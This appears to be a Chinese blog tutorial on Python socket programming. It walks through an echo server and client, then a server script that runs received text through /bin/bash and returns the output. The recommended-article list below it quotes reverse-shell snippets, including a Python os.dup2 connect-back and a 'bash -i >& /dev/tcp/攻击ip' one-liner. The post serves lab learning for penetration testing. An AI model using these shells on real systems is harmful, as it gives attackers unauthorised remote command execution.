再学python——网络编程(附反弹shell的编写)

最新推荐文章于 2024-11-11 21:19:25 发布
最新推荐文章于 2024-11-11 21:19:25 发布
阅读量393 收藏 2
点赞数 1
分类专栏: python 文章标签: python socket
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/106522370
版权
C/S架构

C: Client
S: Server
客户机和服务器结构。Server唯一的目的就是等待Client的请求,Client连上Server器发送必要的数据,然后等待Server端完成请求的反馈
 

C/S网络编程

Server端进行设置,首先船舰一个通信端点,让Server端能够监听请求,之后就进入等待和处理Client请求的无限循环中。
Client编程相对Server端编程简单,在只要创建一个通信端点,建立到服务器的连接,就可以提出请求了
 

套接字

套接字是一种具有上述所说的“通信端点”概念的计算机网络数据结构。网络化的应用程序在开始任何通讯之前都必须创建套接字
 

Python网络编程
socket模块

socket 模块的 socket() 函数用来创建套接字
使用 socket.socket() 函数来创建套接字,方法如下:

socket(socket_family,socket_type,protocol=0)

socket_family: 套接字家族可以使AF_UNIX或者AF_INET
socket_type: 套接字类型可以根据是面向连接的还是非连接分为SOCK_STREAM(TCP)或SOCK_DGRAM(UDP)
protocol: 一般不填默认为0

套接字对象方法

服务器端套接字

s.bind() ----- 绑定地址(host,port)到套接字
s.listen(m) ----- 开始TCP监听。m 为操作系统可以挂起的最大连接数量。该值至少为1,大部分应用程序设为5
s.accept() ----- 被动接受TCP客户端连接,(阻塞式)等待连接的到来

客户端套接字

s.connect() ----- 主动初始化TCP服务器连接
s.connect_ex() ----- connect()函数的扩展版本,出错时返回出错码,而不是抛出异常

公共用途的套接字函数

s.recv() ----- 接收TCP数据。数据以字符串形式返回,bufsize指定要接收的最大数据
s.send() ----- 发送TCP数据
s.sendall() ----- 完整发送TCP数据。完整发送TCP数据
s.recvfrom() ----- 接收UDP数据。与recv()类似,但返回值是(data,addres)
s.sendto() ----- 发送UDP数据将。数据发送到套接字
s.close() ----- 关闭套接字
s.getpeername() ----- 返回连接套接字的远程地址。返回值通常是元组(ipaddr,port)
s.getsockname() ----- 返回当前套接字的地址。通常是一个元组(ipaddr,port)
...

 

做个实验吧

实验设备
服务端:Kali Linux主机
客户端:宿主机 ------------------- 互相ping通
 
服务端
server.py(都写在注释呢)

#!usr /bin/env python
from socket import *
from time import ctime

HOST = ''
PORT = 2334 //监听端口
BUFSIZE = 1024  //传递数据大小

ADDR = (HOST,PORT)

tcpServer = socket(AF_INET,SOCK_STREAM) //创建TCP套接字
tcpServer.bind(ADDR) //绑定地址
tcpServer.listen(5)  //可挂起的最大连接数

while True:
        print ('waiting for connection...')
        tcpClient,addr = tcpServer.accept() //被动接收客户端套接字和地址
        print ('..connected from:',addr)
        while True:
                data = tcpClient.recv(BUFSIZE) //接收客户端数据
                if not data:
                        break
                tcpClient.send('[%s] %s'%(ctime(),data)) //将服务端的数据返回给客户端

tcpClient.close()
tcpServer.close()

启动服务端脚本
在这里插入图片描述
客户端
client.py
踩坑:因为我客户机是python3,服务端是python2。
data在python2中为str类型,但是在python3中为bytes类型,所以我们要转换参数类型

从str到bytes:调用方法encode()
从bytes到str:调用方法decode()

from socket import *

HOST = '192.168.101.45' //服务端地址
PORT = 2334
BUFSIZE = 1024

ADDR = (HOST,PORT)

tcpClient = socket(AF_INET,SOCK_STREAM)
tcpClient.connect(ADDR)


while True:
        data = input('!~~!:')
        if not data:
            break
        tcpClient.send(data.encode()) //向服务端发送的数据!data记得转码!
        data = tcpClient.recv(BUFSIZE)
        if not data:
            break
        print (data)

tcpClient.close()

启动客户端脚本
连上服务端之后,输入内容,发给服务端,服务端将接收的数据原样发送给客户端,客户端再接收显示
在这里插入图片描述
 

接下来写个反弹shell

渗透测试及内网渗透常用到的东东 (根据测试场景使用)

正向反弹:服务端监听,客户机连接
反向反弹:客户机监听,服务端连接

客户端无需修改。只要服务端将客户端发送的数据,接收并写入系统shell中调用系统命令来执行即可

服务端 shell.py

#!usr /bin/env python
from socket import *
from time import ctime
from subprocess import Popen,PIPE 

HOST = ''
PORT = 2334
BUFSIZE = 1024

ADDR = (HOST,PORT)

tcpServer = socket(AF_INET,SOCK_STREAM)
tcpServer.bind(ADDR)
tcpServer.listen(5)

while True:
        print ('waiting for connection...')
        tcpClient,addr = tcpServer.accept()
        print ('..connected from:',addr)
        while True:
                data = tcpClient.recv(BUFSIZE)
                if not data:
                        break
                shell = Popen(['/bin/bash','-c',data],stdin=PIPE,stdout=PIPE) 
                //将客户端发送的数据带入/bin/bash中执行系统命令
                data = shell.stdout.read()
                tcpClient.send('[%s] %s'%(ctime(),data)) //将执行命令后的内容返回发送给客户端

tcpClient.close()
tcpServer.close()

服务器开启监听后。客户端执行脚本
在这里插入图片描述
 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
专栏目录
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
杨秀璋的专栏
09-29 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Wireshark抓包原理知识,并结合NetworkMiner工具抓取了图像资源和用户名密码,本文将讲解Python网络攻防相关基础知识,包括正则表达式、Web编程和套接字通信。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的经验进行讲解。
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
python反弹shell
weixin_42576467的博客
01-07 724
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
使用python反弹shell
weixin_43803070的博客
07-10 2048
先上脚本: #!/usr/bin/python #coding=utf-8 import os,subprocess,socket s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.107",19)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) ...
我非我同学的python反弹shell的代码
Magicbreaker的专栏
12-31 3882
不知道怎么忽然想看这个,呵呵 小我的python的反shell的代码 #!/usr/bin/python # Python Connect-back Backdoor # Author: wofeiwo # Version: 1.0 # Date: July 15th 2006 import sys import os import socket shell = "/bin/sh" def us
各种shell反弹方法
weixin_46626737的博客
05-16 2790
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
[Web安全]Python利用Socket反弹shell,多线程反弹Shell
_DESpiSED的博客
09-22 2036
本文详细介绍了Python利用套接字编程反弹shell和多线程反弹shell的过程,给网络安全初学者提供一定思路。
Python渗透测试编程基础——Socket网络编程
PICACHU+++的博客
03-24 2611
Socket通信是基于客户端/服务器结构(C/S),可隐藏复杂的TCP/IP协议族,只要遵循Socket的规定就可以进行网络程序开发,简单且开发效率高。Python中的socket模块,提供了套接字编程的大部分功能。支持使用UDP和TCP协议进行网络通信。UDP属于无连接协议,在向接收方发送信息时不需要建立连接,而是直接发送即可。Socket又称"套接字",是计算机间进行网络通信的一套程序接口。UDP的应用:域名系统;socket模块方法如图所示。一、socket编程简介。UDP编程流程及常用的。
python画简单火柴人代码-趣学Python编程
weixin_39546661的博客
11-11 6833
Python是一种强大并通俗易懂的编程语言,而且它易学又好用!但是关于学习Python语言的书大多很枯燥无趣,读起来没什么乐趣。本书把你带入一个鲜活的Python编程世界。作者Jason R. Briggs将带领你用独特的(往往很好玩的)示例程序带你学习基础知识。每章后面都配有编程练习来帮助训练思维并加强理解。在本书的最后部分,你将编写两个完整的游戏:一个经典弹球游戏的复制品,以及一个能在平台上跳...
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
热门推荐
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
Python安全之编写反弹连接‘免杀’后门
weixin_43853965的博客
01-07 1383
生成后门的工具: 虽然在WEB安全专栏,不过今天要编写的是一个二进制后门,而不是WEB后门。按惯例还是来一段KALI里面的“免杀”后门生成工具,大名鼎鼎的metasploit: 方法一msfconsole: msf5 > use windows/shell/reverse_tcp msf5 payload(windows/shell/reverse_tcp) > set lhost...
反弹shell
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
Python3 实现一个简单的反弹shell工具
坚持硬核
01-15 638
Server.py from socket import * from time import ctime from threading import Thread from subprocess import Popen,PIPE HOST = "" PROT = 23335 BUFSIZE = 1024 ADDR = (HOST, PROT) def send(worker_socket,data): worker_socket.send(data) def worker(worke
内网渗透之——内网转发(反弹shell、端口、代理)
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
Python 反向 Shell 代码分析
weixin_46104215的博客
11-27 1100
import os,socket,subprocess; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.110.130',2222)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) s = socket.socket(socket.AF_INET,.
python GUI编码入门-21】如何用Tkinter创建一个记事本应用
木头大左的博客
11-08 69
在现代编程环境中,图形用户界面(GUI)应用程序的开发变得越来越重要。Python的Tkinter库是一个功能强大且易于使用的GUI工具包,非常适合初学者和有经验的开发者使用。本文将详细介绍如何使用Tkinter创建一个简易的记事本应用,涵盖从安装到实现各项功能的全过程。Tkinter是Python的标准GUI库,它提供了丰富的接口来创建窗口、对话框、按钮等常见的GUI组件。Tkinter具有良好的跨平台性,可以在Windows、Mac OS和Linux上运行。
一次薅国家超算平台的记录
weixin_55179972的博客
11-07 407
参与 谁是下一个“AI”跃人 -AI体验推介活动,赢取千元算力券!(https://www.scnet.cn/home/subject/modular/index270.html)2. Clone开源的Llama3 Chinese (https://github.com/LlamaFamily/Llama-Chinese)活动名称主题:国家超算互联网「AI跃升季」:谁是下一个“AI”跃人 - AI算力体验活动。其中位置1,2替换为商品基模型和训练出来的微调模型。模型改为商城下载的模型。2、运行的过程记录。
SpringBoot 实现图片加水印
最新发布
心猿意码
11-11 292
通过上述步骤,我们可以在SpringBoot项目中实现一个简单的图片加水印功能。当然,实际应用中可能需要更复杂的水印处理,比如水印图片、调整水印位置等,可以根据需求进行相应的扩展和优化。
推荐一款管道数据检索工具:Pipedata-Pro
11-09 386
是一款专为设计石油、天然气、水和蒸汽管道及管道系统的工程师开发的应用程序。该应用程序提供了设计管道系统所需的工程数据,拥有一个全面的管道类型、配件和材料。
Python网络编程实验报告:TCP端口扫描与多功能服务端设计
资源摘要信息: "Python网络编程实验报告,实验一、实验二、实验三,优秀课程设计报告" 知识点详细说明: 1. Python3实现TCP全连接端口扫描器: Python网络编程中,TCP全连接扫描是一种基本的网络探测技术。通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值